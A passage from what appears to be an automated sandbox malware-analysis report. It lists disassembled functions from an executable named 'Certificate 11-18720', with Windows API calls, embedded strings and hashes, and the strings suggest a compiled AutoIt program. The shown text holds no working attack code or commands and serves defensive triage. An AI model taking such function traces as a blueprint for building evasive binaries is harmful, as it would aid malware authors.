                                                                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                    • API String ID: 2258743419-1018226102
                                                                                    • Opcode ID: 6e2a4c3e915743be8d5a8a0818cff35500180f072b34b833ea98c7675304d619
                                                                                    • Instruction ID: eae33e6afbc12d07016485db603a896c806826219e7703dcbe56aafe30b1de08
                                                                                    • Opcode Fuzzy Hash: 6e2a4c3e915743be8d5a8a0818cff35500180f072b34b833ea98c7675304d619
                                                                                    • Instruction Fuzzy Hash: 32127B715083429FC724EF64C895EAFBBE6BFC9304F40491EF58997291DB309A49CB92
                                                                                    Function 0062CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0062CEFB
                                                                                    • DestroyWindow.USER32(?,?), ref: 0062CF73
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0062CFF4
                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0062D016
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0062D025
                                                                                    • DestroyWindow.USER32(?), ref: 0062D042
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,005C0000,00000000), ref: 0062D075
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0062D094
                                                                                    • GetDesktopWindow.USER32 ref: 0062D0A9
                                                                                    • GetWindowRect.USER32(00000000), ref: 0062D0B0
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0062D0C2
                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0062D0DA
                                                                                      • Part of subcall function 005DB526: GetWindowLongW.USER32(?,000000EB), ref: 005DB537
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                    • String ID: 0$tooltips_class32
                                                                                    • API String ID: 3877571568-3619404913
                                                                                    • Opcode ID: b5dfdce966b3ea54a3c605b00ad819dec0387015a7e3a934060bd5d786071c1e
                                                                                    • Instruction ID: 8a8e6b25e2fafb869a95880cb7a8c96cf51807d1252608ab388f0e6a5e24b25c
                                                                                    • Opcode Fuzzy Hash: b5dfdce966b3ea54a3c605b00ad819dec0387015a7e3a934060bd5d786071c1e
                                                                                    • Instruction Fuzzy Hash: 2571ABB4140705AFD724DF28DC85FAA7BEAEB89704F04461DF9858B3A1D771E942CB22
                                                                                    Function 0062F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0062F37A
                                                                                      • Part of subcall function 0062D7DE: ClientToScreen.USER32(?,?), ref: 0062D807
                                                                                      • Part of subcall function 0062D7DE: GetWindowRect.USER32(?,?), ref: 0062D87D
                                                                                      • Part of subcall function 0062D7DE: PtInRect.USER32(?,?,0062ED5A), ref: 0062D88D
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0062F3E3
                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0062F3EE
                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0062F411
                                                                                    • _wcscat.LIBCMT ref: 0062F441
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0062F458
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0062F471
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0062F488
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0062F4AA
                                                                                    • DragFinish.SHELL32(?), ref: 0062F4B1
                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0062F59C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                    • API String ID: 169749273-3440237614
                                                                                    • Opcode ID: 2fd2152c318d51ac4d64c63949f09755bcbaacc283468b8d4e14cd63d8e796fe
                                                                                    • Instruction ID: 43426111108ea794b8905a22c629fc070c77528caf5577f67b1dabf51dd8a239
                                                                                    • Opcode Fuzzy Hash: 2fd2152c318d51ac4d64c63949f09755bcbaacc283468b8d4e14cd63d8e796fe
                                                                                    • Instruction Fuzzy Hash: 1F613871508301AFC311EFA4DC89E9FBBF9BF89710F004A2EF595961A1DB709A49CB52
                                                                                    Function 0060AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0060AB3D
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0060AB46
                                                                                    • VariantClear.OLEAUT32(?), ref: 0060AB52
                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0060AC40
                                                                                    • __swprintf.LIBCMT ref: 0060AC70
                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0060AC9C
                                                                                    • VariantInit.OLEAUT32(?), ref: 0060AD4D
                                                                                    • SysFreeString.OLEAUT32(00000016), ref: 0060ADDF
                                                                                    • VariantClear.OLEAUT32(?), ref: 0060AE35
                                                                                    • VariantClear.OLEAUT32(?), ref: 0060AE44
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0060AE80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                    • API String ID: 3730832054-3931177956
                                                                                    • Opcode ID: 68405275ea7c8817fd9f41d0bc7e55b6814b8c69f932d0d40d424434991cca2d
                                                                                    • Instruction ID: 96aadc8e1d600c1666146f1b6157d9d00806e13a63cb0439a8d4bb23b32c1ebc
                                                                                    • Opcode Fuzzy Hash: 68405275ea7c8817fd9f41d0bc7e55b6814b8c69f932d0d40d424434991cca2d
                                                                                    • Instruction Fuzzy Hash: D0D1C071A80206DBDB289F95C885BABBBF7FF44740F14805AE4059B2C1DB74EC41DBA2
                                                                                    Function 0062716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 006271FC
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00627247
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                    • API String ID: 3974292440-4258414348
                                                                                    • Opcode ID: 9f7356f5c9fabf453ca6225bfeb08f6bad6f177cf3e47a1a17a6fbd96f03436e
                                                                                    • Instruction ID: aaec913ee9e8f604f2f7dda1f424149c2bba71631ef65cdd96953e4b8fd23f8c
                                                                                    • Opcode Fuzzy Hash: 9f7356f5c9fabf453ca6225bfeb08f6bad6f177cf3e47a1a17a6fbd96f03436e
                                                                                    • Instruction Fuzzy Hash: 87916E342086569FCB14EF24D855E6EBFA2BF94310F00485DF8965B3A2DB30ED0ACB81
                                                                                    Function 005FCB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumChildWindows.USER32(?,005FCF50), ref: 005FCE90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ChildEnumWindows
                                                                                    • String ID: 4+g$CLASS$CLASSNN$H+g$INSTANCE$L+g$NAME$P+g$REGEXPCLASS$T+g$TEXT
                                                                                    • API String ID: 3555792229-2037624313
                                                                                    • Opcode ID: 609a3c1b042fed865262b1adb6379ec52bb3c947da62037bba83eb07091ec8d9
                                                                                    • Instruction ID: 90117e47fe80186d6bfeba6ac02c3004e50bb1bc2edbfe8e18f35451a6756126
                                                                                    • Opcode Fuzzy Hash: 609a3c1b042fed865262b1adb6379ec52bb3c947da62037bba83eb07091ec8d9
                                                                                    • Instruction Fuzzy Hash: 48919030A0054FABCB19EFA0C586BFAFF79BF44300F50852AD659A7251DF346959CB90
                                                                                    Function 0062E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0062E5AB
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00629808,?), ref: 0062E607
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0062E647
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0062E68C
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0062E6C3
                                                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,00629808,?), ref: 0062E6CF
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0062E6DF
                                                                                    • DestroyIcon.USER32(?), ref: 0062E6EE
                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0062E70B
                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0062E717
                                                                                      • Part of subcall function 005E0FA7: __wcsicmp_l.LIBCMT ref: 005E1030
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                    • String ID: .dll$.exe$.icl
                                                                                    • API String ID: 1212759294-1154884017
                                                                                    • Opcode ID: a9d046660800a1d49b7d5fe4d059b143915862b5766c5a6105ab84220a98cc6f
                                                                                    • Instruction ID: 5f91cd8a11899afb3488553c47a3eef9b98d1d6ff44b9bcf9eedafc10987c92e
                                                                                    • Opcode Fuzzy Hash: a9d046660800a1d49b7d5fe4d059b143915862b5766c5a6105ab84220a98cc6f
                                                                                    • Instruction Fuzzy Hash: D961D371900A25BEEB24DF64DC4AFFE7BA9BB18714F104125F915E61D0EBB19D80CB60
                                                                                    Function 0060D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0060D292
                                                                                    • GetDriveTypeW.KERNEL32 ref: 0060D2DF
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0060D327
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0060D35E
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0060D38C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                    • API String ID: 1148790751-4113822522
                                                                                    • Opcode ID: ae7ce7f40a2fcf998fc133bdf7e362db8e9a36bd199b823a1744d291a7043c29
                                                                                    • Instruction ID: eb1a3f1de48ca31a938293778fb61c751f915676a681681e3fb6ccf79dc28e2e
                                                                                    • Opcode Fuzzy Hash: ae7ce7f40a2fcf998fc133bdf7e362db8e9a36bd199b823a1744d291a7043c29
                                                                                    • Instruction Fuzzy Hash: 13513A71504206AFC704EF54C886E6ABBE5FF99718F04895DF889673A1DB31EE06CB42
                                                                                    Function 006026BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00633973,00000016,0000138C,00000016,?,00000016,0065DDB4,00000000,?), ref: 006026F1
                                                                                    • LoadStringW.USER32(00000000,?,00633973,00000016), ref: 006026FA
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00633973,00000016,0000138C,00000016,?,00000016,0065DDB4,00000000,?,00000016), ref: 0060271C
                                                                                    • LoadStringW.USER32(00000000,?,00633973,00000016), ref: 0060271F
                                                                                    • __swprintf.LIBCMT ref: 0060276F
                                                                                    • __swprintf.LIBCMT ref: 00602780
                                                                                    • _wprintf.LIBCMT ref: 00602829
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00602840
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                    • API String ID: 618562835-2268648507
                                                                                    • Opcode ID: b20dd7d37be2c25afd8c2097229e6bafb4b0f2415dc6fa2877f6221ff85b0348
                                                                                    • Instruction ID: 946b2aaf1397c7fc8b57f8211fb7907071122e5d79736699151243727f9ca6df
                                                                                    • Opcode Fuzzy Hash: b20dd7d37be2c25afd8c2097229e6bafb4b0f2415dc6fa2877f6221ff85b0348
                                                                                    • Instruction Fuzzy Hash: 0F413D7280021AAACB14FBD0DD9AEEEBB79BF95340F500069F50576092EE306F49CB60
                                                                                    Function 0060D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0060D0D8
                                                                                    • __swprintf.LIBCMT ref: 0060D0FA
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0060D137
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0060D15C
                                                                                    • _memset.LIBCMT ref: 0060D17B
                                                                                    • _wcsncpy.LIBCMT ref: 0060D1B7
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0060D1EC
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0060D1F7
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0060D200
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0060D20A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                    • String ID: :$\$\??\%s
                                                                                    • API String ID: 2733774712-3457252023
                                                                                    • Opcode ID: 9b63d39c3adfc22705b4520a395c57f741d28f864900448a9aaf1ed0cb474d81
                                                                                    • Instruction ID: c4255e8480866420983507e7327a8e7afbfb16c817f46ba1ea5125dbf3127ad5
                                                                                    • Opcode Fuzzy Hash: 9b63d39c3adfc22705b4520a395c57f741d28f864900448a9aaf1ed0cb474d81
                                                                                    • Instruction Fuzzy Hash: 3E31C3B694010AABDB21DFA0CC49FEB37BEEF89740F1041B5F609D21A0EB7097458B24
                                                                                    Function 005F87CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                    • String ID:
                                                                                    • API String ID: 884005220-0
                                                                                    • Opcode ID: 76e9aa142fd9f5a363553057ee56759057014b8600435bfa191fd2e4de0e4349
                                                                                    • Instruction ID: 59c58d4c41831c3e59b3567fd8cc97d40539c8cff6dbb939e9c23ad608290fcc
                                                                                    • Opcode Fuzzy Hash: 76e9aa142fd9f5a363553057ee56759057014b8600435bfa191fd2e4de0e4349
                                                                                    • Instruction Fuzzy Hash: F161057290020AAFEB259F65DD497793FA4FF543B0F200925EA81AB181DF78DD408B95
                                                                                    Function 0062E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0062E754
                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0062E76B
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0062E776
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0062E783
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0062E78C
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0062E79B
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0062E7A4
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0062E7AB
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0062E7BC
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0064D9BC,?), ref: 0062E7D5
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0062E7E5
                                                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 0062E809
                                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0062E834
                                                                                    • DeleteObject.GDI32(00000000), ref: 0062E85C
                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0062E872
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3840717409-0
                                                                                    • Opcode ID: 725e588757c73f3f9ddcf6064e2afe89fc7896417711ac90bb26d029c0e6aeb0
                                                                                    • Instruction ID: d9be9a5a2319721604c597a6f10d243f8dae76f4264333ce91925703b5335090
                                                                                    • Opcode Fuzzy Hash: 725e588757c73f3f9ddcf6064e2afe89fc7896417711ac90bb26d029c0e6aeb0
                                                                                    • Instruction Fuzzy Hash: 06414879A00215EFDB119F65DC88EAB7BBAEF8AB11F108068F906D7260C7719941DF20
                                                                                    Function 006105F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __wsplitpath.LIBCMT ref: 0061076F
                                                                                    • _wcscat.LIBCMT ref: 00610787
                                                                                    • _wcscat.LIBCMT ref: 00610799
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006107AE
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006107C2
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 006107DA
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 006107F4
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00610806
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                    • String ID: *.*
